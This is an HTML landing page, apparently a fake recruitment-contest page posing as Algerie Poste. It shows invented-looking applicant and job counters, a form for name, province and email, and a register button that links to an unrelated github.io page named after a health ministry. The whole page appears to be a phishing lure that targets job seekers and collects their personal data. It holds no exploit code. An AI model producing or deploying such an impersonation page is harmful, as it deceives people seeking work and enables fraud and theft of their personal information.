<!DOCTYPE html>

<html>
<head>
<title></title>
<meta charset="utf-8"/>
<meta content="width=device-width" name="viewport"/>
<link href="https://fonts.googleapis.com/css?family=Abril+Fatface" rel="stylesheet" type="text/css"/>
<link href="https://fonts.googleapis.com/css?family=Bitter" rel="stylesheet" type="text/css"/>
<link href="https://fonts.googleapis.com/css?family=Cabin" rel="stylesheet" type="text/css"/>
<link href="https://fonts.googleapis.com/css?family=Droid+Serif" rel="stylesheet" type="text/css"/>
<link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css"/>
<link href="https://fonts.googleapis.com/css?family=Merriweather" rel="stylesheet" type="text/css"/>
<link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css"/>
<link href="https://fonts.googleapis.com/css?family=Oswald" rel="stylesheet" type="text/css"/>
<link href="https://fonts.googleapis.com/css?family=Ubuntu" rel="stylesheet" type="text/css"/>
<style>
		.bee-row,
		.bee-row-content {
			position: relative
		}

		.bee-form .bee-form-row .bee-field button {
			font-size: inherit;
			font-family: inherit
		}

		body {
			background-color: #ffefcf;
			color: #000;
			font-family: Helvetica Neue, Helvetica, Arial, sans-serif
		}

		a {
			color: #f79e28
		}

		* {
			box-sizing: border-box
		}

		body,
		h1,
		p {
			margin: 0
		}

		.bee-row-content {
			max-width: 1025px;
			margin: 0 auto;
			display: flex
		}

		.bee-row-content .bee-col-w4 {
			flex-basis: 33%
		}

		.bee-row-content .bee-col-w6 {
			flex-basis: 50%
		}

		.bee-row-5 .bee-col-1 .bee-block-4 div.label:not(.inline),
		.bee-row-5 .bee-col-1 .bee-block-4 label:not(.inline),
		.bee-row-content .bee-col-w12 {
			flex-basis: 100%
		}

		.bee-button .content {
			text-align: center
		}

		.bee-button a,
		.bee-icon .bee-icon-label-right a {
			text-decoration: none
		}

		.bee-divider,
		.bee-image {
			overflow: auto
		}

		.bee-divider .center,
		.bee-image .bee-center {
			margin: 0 auto
		}

		.bee-row-5 .bee-col-1 .bee-block-4 .bee-form-row:not(.bee-sidelabel) input:not([type=checkbox]):not([type=radio]),
		.bee-row-8 .bee-col-1 .bee-block-1 {
			width: 100%
		}

		.bee-form .bee-form-row .bee-field {
			padding: 3px;
			display: flex;
			flex: 1;
			flex-wrap: wrap;
			align-items: center
		}

		.bee-form .bee-form-row .bee-field input:not([type=checkbox]):not([type=radio]) {
			flex-grow: 1;
			font-family: inherit;
			font-size: inherit
		}

		.bee-form .bee-form-row .bee-field .bee-button-container {
			flex-grow: 1
		}

		.bee-form input[type=color] {
			border: none;
			height: 38px
		}

		.bee-form input[type=color]::-webkit-color-swatch-wrapper {
			margin: 0;
			padding: 2px
		}

		.bee-form input[type=color]::-webkit-color-swatch {
			margin: 0;
			padding: 0
		}

		.bee-icon {
			display: inline-block;
			vertical-align: middle
		}

		.bee-icon .bee-content {
			display: flex;
			align-items: center
		}

		.bee-image img {
			display: block;
			width: 100%
		}

		.bee-text {
			overflow-wrap: anywhere
		}

		@media (max-width:768px) {
			.bee-form form {
				width: 100% !important
			}

			.bee-row-content:not(.no_stack) {
				display: block
			}
		}

		.bee-row-1,
		.bee-row-2,
		.bee-row-3,
		.bee-row-4,
		.bee-row-5,
		.bee-row-6,
		.bee-row-7,
		.bee-row-8,
		.bee-row-9 {
			background-repeat: no-repeat
		}

		.bee-row-1 .bee-row-content,
		.bee-row-4 .bee-row-content,
		.bee-row-6 .bee-row-content {
			background-color: #fff;
			background-repeat: no-repeat;
			color: #000
		}

		.bee-row-2 .bee-row-content,
		.bee-row-3 .bee-row-content,
		.bee-row-7 .bee-row-content {
			background-color: #f79e28;
			background-repeat: no-repeat;
			color: #000
		}

		.bee-row-2 .bee-col-1 .bee-block-1 {
			padding: 50px 20px 10px
		}

		.bee-row-3 .bee-col-1,
		.bee-row-3 .bee-col-2 {
			padding: 5px 20px
		}

		.bee-row-3 .bee-col-1 .bee-block-1,
		.bee-row-3 .bee-col-2 .bee-block-1,
		.bee-row-3 .bee-col-3 .bee-block-1,
		.bee-row-4 .bee-col-1 .bee-block-2 {
			padding: 10px
		}

		.bee-row-3 .bee-col-3 {
			padding: 5px 20px 30px
		}

		.bee-row-4 .bee-col-1 .bee-block-1 {
			padding: 50px 20px 15px
		}

		.bee-row-5 .bee-row-content,
		.bee-row-8 .bee-row-content,
		.bee-row-9 .bee-row-content {
			background-repeat: no-repeat;
			color: #000
		}

		.bee-row-5 .bee-col-1,
		.bee-row-5 .bee-col-2 {
			background-color: #f2f2f2;
			border-bottom: 10px solid #fff;
			border-left: 10px solid #fff;
			border-right: 10px solid #fff;
			border-top: 10px solid #fff;
			padding-bottom: 5px;
			padding-top: 5px
		}

		.bee-row-5 .bee-col-1 .bee-block-1 {
			padding: 10px 20px 5px
		}

		.bee-row-5 .bee-col-1 .bee-block-3 {
			padding: 20px 30px 10px
		}

		.bee-row-5 .bee-col-1 .bee-block-4 {
			font-family: inherit;
			font-size: 14px;
			padding: 10px 25px;
			text-align: center
		}

		.bee-row-5 .bee-col-1 .bee-block-5 {
			text-align: center;
			padding: 10px
		}

		.bee-row-7 .bee-col-1,
		.bee-row-9 .bee-col-1,
		.bee-row-9 .bee-col-1 .bee-block-1 {
			padding-bottom: 5px;
			padding-top: 5px
		}

		.bee-row-5 .bee-col-2 .bee-block-1 {
			width: 100%;
			text-align: center
		}

		.bee-row-8 .bee-col-1 {
			padding-bottom: 20px
		}

		.bee-row-9 .bee-col-1 .bee-block-1 {
			color: #9d9d9d;
			font-family: inherit;
			font-size: 15px;
			text-align: center
		}

		.bee-row-9 .bee-col-1 .bee-block-1 .bee-icon-image {
			padding: 5px 6px 5px 5px
		}

		.bee-row-9 .bee-col-1 .bee-block-1 .bee-icon:not(.bee-icon-first) .bee-content {
			margin-left: 0
		}

		.bee-row-9 .bee-col-1 .bee-block-1 .bee-icon::not(.bee-icon-last) .bee-content {
			margin-right: 0
		}

		.bee-row-5 .bee-col-1 .bee-block-4 form {
			display: inline-block;
			width: 100%
		}

		.bee-row-5 .bee-col-1 .bee-block-4 div.label,
		.bee-row-5 .bee-col-1 .bee-block-4 label {
			color: #000;
			line-height: 200%;
			text-align: left;
			letter-spacing: normal;
			display: block
		}

		.bee-row-5 .bee-col-1 .bee-block-4 ::-webkit-input-placeholder {
			color: #000
		}

		.bee-row-5 .bee-col-1 .bee-block-4 :-moz-placeholder {
			color: #000
		}

		.bee-row-5 .bee-col-1 .bee-block-4 ::-moz-placeholder {
			color: #000
		}

		.bee-row-5 .bee-col-1 .bee-block-4 :-ms-input-placeholder {
			color: #000
		}

		.bee-row-5 .bee-col-1 .bee-block-4 .bee-field>label:first-child,
		.bee-row-5 .bee-col-1 .bee-block-4 div.label {
			padding: 3px
		}

		.bee-row-5 .bee-col-1 .bee-block-4 input:not([type=checkbox]):not([type=radio]):not([type=image]) {
			background-color: #fff;
			border-bottom: 1px solid transparent;
			border-left: 1px solid transparent;
			border-radius: 4px;
			border-right: 1px solid transparent;
			border-top: 1px solid transparent;
			color: #000;
			padding: 10px;
			min-height: 48px
		}

		.bee-row-5 .bee-col-1 .bee-block-4 input:not([type=checkbox]):not([type=radio]):focus {
			outline-color: #3aaee0
		}

		.bee-row-5 .bee-col-1 .bee-block-4 button {
			background-color: #4a1d32;
			border-bottom: 0 solid transparent;
			border-left: 0 solid transparent;
			border-radius: 3px;
			border-right: 0px solid transparent;
			border-top: 0 solid transparent;
			color: #fff;
			line-height: 200%;
			width: 100%;
			letter-spacing: -15px
		}

		.bee-row-5 .bee-col-1 .bee-block-4 .bee-button-container {
			padding-left: 10px;
			text-align: center
		}
	</style>
</head>
<body>
<div class="bee-page-container">
<div class="bee-row bee-row-1">
<div class="bee-row-content">
<div class="bee-col bee-col-1 bee-col-w12">
<div class="bee-block bee-block-1 bee-divider">
<div class="spacer" style="height:20px;"></div>
</div>
</div>
</div>
</div>
<div class="bee-row bee-row-2">
<div class="bee-row-content">
<div class="bee-col bee-col-1 bee-col-w12">
<div class="bee-block bee-block-1 bee-text">
<div class="bee-text-content" style="font-size: 14px; line-height: 120%; color: #ffffff; font-family: inherit;">
<p style="font-size: 14px; line-height: 16px; text-align: center;"><strong style=""><span style="font-size: 34px; line-height: 40px;">Algerie Poste</span></strong><br style=""/><br style=""/></p>
</div>
</div>
</div>
</div>
</div>
<div class="bee-row bee-row-3">
<div class="bee-row-content">
<div class="bee-col bee-col-1 bee-col-w4">
<div class="bee-block bee-block-1 bee-text">
<div class="bee-text-content" style="font-size: 14px; line-height: 120%; color: #ffffff; font-family: inherit;">
<p style="font-size: 14px; line-height: 16px; text-align: center;"><span style="font-size: 38px; line-height: 45px;"><strong style=""><span style="line-height: 14px;"><span style="color: #e75f1b; line-height: 14px;">+</span>150</span></strong></span><br style=""/>مسجل</p>
</div>
</div>
</div>
<div class="bee-col bee-col-2 bee-col-w4">
<div class="bee-block bee-block-1 bee-text">
<div class="bee-text-content" style="font-size: 14px; line-height: 120%; color: #ffffff; font-family: inherit;">
<p style="font-size: 14px; line-height: 16px; text-align: center;"><span style="font-size: 38px; line-height: 45px;"><strong style=""><span style="line-height: 14px;"><span style="color: #e75f1b; line-height: 14px;">+</span>750</span></strong></span><br style=""/>منصب</p>
</div>
</div>
</div>
<div class="bee-col bee-col-3 bee-col-w4">
<div class="bee-block bee-block-1 bee-text">
<div class="bee-text-content" style="font-size: 14px; line-height: 120%; color: #ffffff; font-family: inherit;">
<p style="font-size: 14px; line-height: 16px; text-align: center;"><span style="font-size: 38px; line-height: 45px;"><strong style=""><span style="line-height: 14px;"><span style="color: #e75f1b; line-height: 14px;">+</span>300K</span></strong></span><br style=""/>حساب</p>
</div>
</div>
</div>
</div>
</div>
<div class="bee-row bee-row-4">
<div class="bee-row-content">
<div class="bee-col bee-col-1 bee-col-w12">
<div class="bee-block bee-block-1 bee-text">
<div class="bee-text-content" style="font-size: 14px; line-height: 120%; color: #4a1d32; font-family: inherit;">
<p style="font-size: 34px; line-height: 40px; text-align: center;"><strong style="">مسابقة توظيف بريد الجزائر</strong></p>
</div>
</div>
<div class="bee-block bee-block-2 bee-divider">
<div class="center bee-separator" style="border-top:1px solid #BBBBBB;width:100%;"></div>
</div>
</div>
</div>
</div>
<div class="bee-row bee-row-5">
<div class="bee-row-content">
<div class="bee-col bee-col-1 bee-col-w6">
<div class="bee-block bee-block-1 bee-text">
<div class="bee-text-content" style="font-size: 14px; line-height: 120%; color: #4a1d32; font-family: inherit;">
<p style="font-size: 34px; line-height: 40px; text-align: center;"><strong style=""><span style="font-size: 24px; line-height: 28px;">:خانة التسجيل</span></strong></p>
</div>
</div>
<div class="bee-block bee-block-2 bee-divider">
<div class="center bee-separator" style="border-top:3px solid #E75F1B;width:50%;"></div>
</div>
<div class="bee-block bee-block-3 bee-text">
<div class="bee-text-content" style="font-size: 14px; line-height: 150%; color: #555555; font-family: inherit;">
<p style="font-size: 14px; line-height: 21px; text-align: left;"><span style="font-size: 16px; line-height: 24px;">الرجاء ملئ المعلومات بعناية. بعد التسجيل ستصلك رسالة على هادا التطبيق</span></p>
</div>
</div>
<div class="bee-block bee-block-4 bee-form">
<form accept-charset="UTF-8" action="ACTION_PLACEHOLDER" autocomplete="on" enctype="multipart/form-data" method="post" target="_self">
<div class="bee-form-row">
<div class="bee-field bee-field-r4c0m3i1"><label for="r4c0m3i1">الإسم و اللقب</label><input id="r4c0m3i1" name="firstname" required="" type="text"/></div>
</div>
<div class="bee-form-row">
<div class="bee-field bee-field-r4c0m3i2"><label for="r4c0m3i2">الولاية</label><input id="r4c0m3i2" name="lastname" required="" type="text"/></div>
</div>
<div class="bee-form-row">
<div class="bee-field bee-field-r4c0m3i3"><label for="r4c0m3i3">الإيميل</label><input id="r4c0m3i3" name="email" required="" type="email"/></div>
</div>
<div class="bee-form-row">
<div class="bee-field bee-field-r4c0m3i11">
<div class="bee-button-container"><button id="r4c0m3i11" name="submit" type="submit" value=""></button></div>
</div>
</div>
</form>
</div>
<div class="bee-block bee-block-5 bee-button"><a class="bee-button-content" href="https://djezzy24.github.io/Ministere-de-la-Sant-/congtar.html" style="font-family: inherit; font-size: 14px; font-weight: 400; background-color: #3AAEE0; border-radius: 4px; border-top: 0px solid transparent; border-right: 0px solid transparent; border-bottom: 0px solid transparent; border-left: 0px solid transparent; color: #ffffff; padding-top: 5px; padding-right: 20px; padding-bottom: 5px; padding-left: 20px; width: auto; max-width: 100%; direction: ltr; display: inline-block;"><span dir="ltr" style="word-break: break-word; font-size: 14px; line-height: 200%;">تسجيل</span></a></div>
</div>
<div class="bee-col bee-col-2 bee-col-w6">
<div class="bee-block bee-block-1 bee-heading">
<h1 style="color:#555555;font-size:23px;font-family:Helvetica Neue, Helvetica, Arial, sans-serif;line-height:120%;text-align:center;direction:ltr;font-weight:700;letter-spacing:normal;margin-top:0;margin-bottom:0;"><span class="tinyMce-placeholder">​</span> </h1>
</div>
</div>
</div>
</div>
<div class="bee-row bee-row-6">
<div class="bee-row-content">
<div class="bee-col bee-col-1 bee-col-w12">
<div class="bee-block bee-block-1 bee-divider">
<div class="spacer" style="height:40px;"></div>
</div>
</div>
</div>
</div>
<div class="bee-row bee-row-7">
<div class="bee-row-content">
<div class="bee-col bee-col-1 bee-col-w12">
<div class="bee-block bee-block-1 bee-divider">
<div class="spacer" style="height:10px;"></div>
</div>
</div>
</div>
</div>
<div class="bee-row bee-row-8">
<div class="bee-row-content">
<div class="bee-col bee-col-1 bee-col-w12">
<div class="bee-block bee-block-1 bee-image"><img alt="" class="bee-center bee-autowidth" src="images/bottom-round-page.png" style="max-width:1025px;"/></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</body>
</html>
